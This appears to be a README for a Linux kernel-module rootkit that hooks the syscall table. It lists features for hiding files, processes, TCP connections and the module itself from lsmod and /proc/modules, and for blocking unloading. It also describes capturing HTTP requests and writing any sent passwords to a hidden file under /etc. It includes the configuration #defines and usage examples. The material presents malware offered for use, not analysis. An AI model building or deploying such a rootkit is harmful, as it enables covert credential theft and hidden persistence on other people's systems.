rootkit for linux, works by modifying syscall table, it's a kernel module
warning: not done yet, list of features is below and what's more rootkit prints debug information to dmesg
- hiding files with names ending on defined siffix (FILE_SUFFIX - ".rootkit" by default)
- hiding processes which cmdline contains defined text (COMMAND_CONTAINS - ".//./" by default)
examples:
.//./malicious_process
wget http://cdimage.debian.org/debian-cd/8.5.0/amd64/iso-cd/debian-8.5.0-amd64-CD-1.iso .//./ - intercepting http (not https!) requests.
all intercepted GET and POST http requests will be writen to /etc/http_requests[FILE_SUFFIX]
when password is sent in request - it's written additionally to /etc/passwords[FILE_SUFFIX] - rootkit module is invisible in 'lsmod' command, file /proc/modules, and directory /sys/module/
- unable to unload rootkit (if UNABLE_TO_UNLOAD is set) - rmmod: ERROR: Module rootkit is not currently loaded
- hiding TCP connections of hidden processes
is in rootkit.c
//configuration
#define FILE_SUFFIX ".rootkit"
#define COMMAND_CONTAINS ".//./"
#define ROOTKIT_NAME "rootkit"
#define SYSCALL_MODIFY_METHOD PAGE_RW //method of making syscall table writeable, CR0 or PAGE_RW
#define UNABLE_TO_UNLOAD 0Linux x 3.16.0-38-generic #52~14.04.1-Ubuntu SMP Fri May 8 09:43:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux